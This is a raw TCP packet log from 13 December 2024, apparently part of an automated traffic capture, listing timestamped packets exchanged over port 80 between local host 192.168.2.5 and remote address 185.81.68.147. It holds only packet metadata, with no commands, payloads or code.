                                                                                                                                                                Dec 13, 2024 01:37:13.226849079 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.227571011 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.270309925 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.371659994 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.371737003 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.371849060 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.371948004 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.372237921 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.372282028 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.372334957 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.373091936 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.373142958 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.373172998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.374000072 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.374047995 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.374103069 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.374907970 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.374950886 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.374999046 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.375823975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.375864983 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.375914097 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.376734972 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.376779079 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.376826048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.377650023 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.377702951 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.377733946 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.378542900 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.378583908 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.378654003 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.379467010 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.379508018 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.379597902 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.380377054 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.380419970 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.380469084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.381309032 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.381366014 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.381412983 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.382184029 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.382225990 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.382272959 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.383105040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.383145094 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.383218050 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.384030104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.384069920 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.384145021 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.384938002 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.384982109 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.385094881 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.385834932 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.385890007 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.385921001 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.386730909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.386781931 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.386898041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.387639046 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.387684107 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.387733936 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.388555050 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.388607025 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.388660908 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.389470100 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.389516115 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.389560938 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.390372038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.390422106 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.390458107 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.391288996 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.391344070 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.391392946 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.392193079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.392277002 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.392304897 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.393100977 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.393146038 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.393192053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.394026041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.394072056 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.394114017 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.394908905 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.394957066 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.395009041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.395838022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.395895004 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.395956993 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.396756887 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.396805048 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.396845102 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.397644043 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.397687912 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.397736073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.398588896 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.398638964 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.398674011 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.399455070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.399501085 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.399553061 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.400363922 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.400424004 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.400471926 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.401281118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.401336908 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.401381016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.402230978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.402277946 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.402323961 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.403115034 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.403192043 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.403238058 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.404115915 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.404160976 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.404205084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.404972076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.405010939 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.405067921 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.405849934 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.405898094 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.405942917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.406759977 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.406809092 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.406825066 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.407666922 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.407722950 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.407763004 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.408580065 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.408637047 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.408674955 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.409471989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.409517050 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.409563065 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.410413980 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.410454988 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.410511017 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.411329985 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.411379099 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.411448956 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.412242889 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.412286997 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.412316084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.413177967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.413212061 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.413240910 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.414031982 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.414077044 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.414123058 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.414930105 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.414972067 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.414999008 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.415836096 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.415878057 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.415925026 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.416747093 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.416791916 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.416852951 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.417644024 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.417685986 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.417777061 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.418612003 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.418653965 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.418683052 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.473411083 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.563723087 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.563899040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.564066887 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.564155102 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.564297915 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.564342976 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.565052986 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.565156937 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.565206051 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.565946102 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.566029072 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.566072941 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.566871881 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.566994905 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.567053080 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.567774057 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.567888021 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.567929983 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.568686962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.568804026 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.568844080 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.569578886 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.569694042 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.569734097 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.570569038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.570635080 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.570689917 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.571441889 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.571564913 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.571616888 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.572314024 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.572428942 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.572624922 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.573249102 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.573359013 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.573400974 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.574121952 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.574254036 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.574294090 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.575076103 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.575181961 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.575227976 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.575978994 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.576117992 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.576174021 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.576961994 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.576982975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.577048063 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.577769041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.577888012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.577986002 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.578680038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.578850031 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.578912020 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.579590082 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.579694033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.579747915 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.580490112 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.580610037 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.580672026 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.581429958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.581548929 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.581604958 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.582343102 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.582469940 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.582530022 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.583231926 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.583349943 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.583415985 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.584153891 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.584256887 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.584316969 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.585040092 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.585165977 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.585226059 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.585951090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.586074114 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.586132050 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.586905003 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.586962938 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.587021112 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.587790012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.587899923 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.587964058 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.588943005 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.589322090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.589384079 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.589598894 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.589699984 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.589754105 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.590506077 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.590614080 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.590729952 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.591430902 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.591501951 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.591557980 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.592330933 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.592436075 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.592504025 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.593230009 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.593347073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.593405008 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.594142914 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.594254971 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.594314098 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.595057964 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.595161915 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.595220089 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.595977068 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.596091032 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.596147060 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.596858025 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.596992970 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.597049952 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.597785950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.597899914 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.597974062 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.598690033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.598776102 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.598831892 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.599669933 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.599852085 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.599905968 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.600531101 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.600667000 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.600728035 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.601423025 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.601556063 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.601610899 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.602329016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.602442026 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.602503061 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.603239059 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.603380919 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.603440046 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.604155064 CET8049707185.81.68.147192.168.2.5
